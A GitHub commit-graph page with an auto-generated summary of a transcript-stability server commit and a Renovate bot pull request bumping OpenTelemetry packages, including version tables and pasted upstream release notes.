Commit Graph

1704 Commits

Author SHA1 Message Date
DarkSky b7ac7caab4 chore(server): improve transcript stability (#13821)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Enhanced audio/video detection for MP4 files to better distinguish
audio-only vs. video.

* **Dependencies**
* Added MP4 parsing dependency and updated AI provider libraries
(Anthropic, Google, OpenAI, etc.).

* **Bug Fixes**
  * Tightened authentication state validation for magic-link/OTP flows.
* Stricter space-join validation to reject invalid client
types/versions.
  * Improved transcript entry deduplication and data handling.

* **API**
* Transcript submit payload now requires infos and removes deprecated
url/mimeType fields.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-10-29 17:48:15 +08:00
renovate[bot] 1a9863d36f chore: bump up opentelemetry (#12651)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.57.0` ->
`^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics))
| [`^0.35.4` ->
`^0.36.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fhost-metrics/0.36.2?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.57.0` ->
`^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql))
| [`^0.47.0` ->
`^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.55.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.57.0` ->
`^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis))
| [`^0.47.0` ->
`^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.55.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core))
| [`^0.44.0` ->
`^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.54.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io))
| [`^0.46.0` ->
`^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.54.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.57.0` ->
`^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/exporter-prometheus)</summary>

###
[`v0.207.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2...fb6476d8243ac8dcaaea74130b9c50c43938275c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2...fb6476d8243ac8dcaaea74130b9c50c43938275c)

###
[`v0.206.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2d3760898cdc4f0e68f9f956603cc5df279eb3a8...8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2d3760898cdc4f0e68f9f956603cc5df279eb3a8...8e9b8bb2a7a2d81ae0b5171efdf1644210697fa2)

###
[`v0.205.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/98f9d720af84bc38074dfd4ab7760ae83a3e9826...2d3760898cdc4f0e68f9f956603cc5df279eb3a8)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/98f9d720af84bc38074dfd4ab7760ae83a3e9826...2d3760898cdc4f0e68f9f956603cc5df279eb3a8)

###
[`v0.204.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/93187f022457da152becc03dd00db8b2500702db...98f9d720af84bc38074dfd4ab7760ae83a3e9826)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/93187f022457da152becc03dd00db8b2500702db...98f9d720af84bc38074dfd4ab7760ae83a3e9826)

###
[`v0.203.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/55f8c20b19777602f993328fe07f523cf465dea3...93187f022457da152becc03dd00db8b2500702db)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/55f8c20b19777602f993328fe07f523cf465dea3...93187f022457da152becc03dd00db8b2500702db)

###
[`v0.202.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2...55f8c20b19777602f993328fe07f523cf465dea3)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2...55f8c20b19777602f993328fe07f523cf465dea3)

###
[`v0.201.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/4ce5bd165195870f292fa95e312cffe05eb9e09d...9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/4ce5bd165195870f292fa95e312cffe05eb9e09d...9dbd1e446be0ecc7c22b00051c5cfb2612d9b0f2)

###
[`v0.201.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/7fde94081ed141c7d61db269b77d5765887a9665...4ce5bd165195870f292fa95e312cffe05eb9e09d)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/7fde94081ed141c7d61db269b77d5765887a9665...4ce5bd165195870f292fa95e312cffe05eb9e09d)

###
[`v0.200.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ac8641a5dbb5df1169bd5ed25a6667a6a6f730ca...7fde94081ed141c7d61db269b77d5765887a9665)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ac8641a5dbb5df1169bd5ed25a6667a6a6f730ca...7fde94081ed141c7d61db269b77d5765887a9665)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/host-metrics)</summary>

###
[`v0.36.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0362-2025-09-29)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46)

##### Bug Fixes

- force new release-please PR
([#&#8203;3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123))
([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0))

###
[`v0.36.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0361-2025-09-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...931c7b34f53ea625da900726b1f57c5c934b5b28)

##### Bug Fixes

- force new release-please PR
([#&#8203;3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098))
([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73))

###
[`v0.36.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0360-2025-03-18)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/d4d3c4f14faa634de960a7616ec2e6115b1b6347...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7)

##### ⚠ BREAKING CHANGES

- chore!: Update to 2.x and 0.200.x @&#8203;opentelemetry/\* packages
from opentelemetry-js.git per [2.x upgrade
guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md)
- The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0.
This means that support for Node.js 14 and 16 has been dropped.
  - The minimum supported TypeScript version has been raised to 5.0.4.
- The compilation target for transpiled TypeScript has been raised to
ES2022 (from ES2017).

##### Miscellaneous Chores

- update to JS SDK 2.x
([#&#8203;2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738))
([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-graphql)</summary>

###
[`v0.55.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0550-2025-10-21)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187))
([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc))

###
[`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0540-2025-10-06)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145))
([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f))

###
[`v0.53.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0533-2025-09-29)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46)

##### Bug Fixes

- force new release-please PR
([#&#8203;3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123))
([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0))

###
[`v0.53.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0532-2025-09-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28)

##### Bug Fixes

- force new release-please PR
([#&#8203;3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098))
([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73))

###
[`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0530-2025-09-10)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034))
([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820))

###
[`v0.52.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0520-2025-09-08)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec)

##### Features

- **deps:** update otel deps
([#&#8203;3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027))
([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a))

###
[`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0510-2025-07-09)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930))
([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea))

###
[`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0500-2025-06-02)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871))
([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc))

###
[`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0490-2025-05-15)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...393b51596dc869983a03ce8857658029ca122a15)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828))
([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346))

###
[`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0480-2025-03-18)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7)

##### ⚠ BREAKING CHANGES

- chore!: Update to 2.x and 0.200.x @&#8203;opentelemetry/\* packages
from opentelemetry-js.git per [2.x upgrade
guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md)
- The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0.
This means that support for Node.js 14 and 16 has been dropped.
  - The minimum supported TypeScript version has been raised to 5.0.4.
- The compilation target for transpiled TypeScript has been raised to
ES2022 (from ES2017).

##### Bug Fixes

- **deps:** update otel core experimental to ^0.57.2
([#&#8203;2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716))
([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da))

##### Miscellaneous Chores

- update to JS SDK 2.x
([#&#8203;2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738))
([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.55.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0550-2025-10-21)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187))
([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc))

##### Bug Fixes

- **deps:** update all patch versions
([#&#8203;3134](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3134))
([c302e35](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c302e3530d6ee9a856ffb43730082e1cee87b0ee))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.53.0 to ^0.54.0

###
[`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0540-2025-10-06)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145))
([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.52.2 to ^0.53.0

###
[`v0.53.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0533-2025-09-29)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46)

##### Bug Fixes

- force new release-please PR
([#&#8203;3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123))
([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0))

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
-
[@&#8203;opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common)
bumped from ^0.38.1 to ^0.38.2
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.52.1 to ^0.52.2

###
[`v0.53.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0532-2025-09-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28)

##### Bug Fixes

- force new release-please PR
([#&#8203;3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098))
([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73))

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
-
[@&#8203;opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common)
bumped from ^0.38.0 to ^0.38.1
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.52.0 to ^0.52.1

###
[`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0530-2025-09-10)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034))
([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.50.0 to ^0.51.0

###
[`v0.52.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0520-2025-09-08)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec)

##### Features

- **deps:** update otel deps
([#&#8203;3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027))
([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.49.0 to ^0.50.0

###
[`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0510-2025-07-09)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/52dd28deae0ebfbec43bdaed82f4749fc9803797...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930))
([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.48.0 to ^0.49.0

###
[`v0.50.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0501-2025-07-04)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...52dd28deae0ebfbec43bdaed82f4749fc9803797)

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
-
[@&#8203;opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common)
bumped from ^0.37.0 to ^0.38.0

###
[`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0500-2025-06-02)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871))
([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.47.0 to ^0.48.0

###
[`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0490-2025-05-15)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...393b51596dc869983a03ce8857658029ca122a15)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828))
([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.46.0 to ^0.47.0

###
[`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0480-2025-03-18)

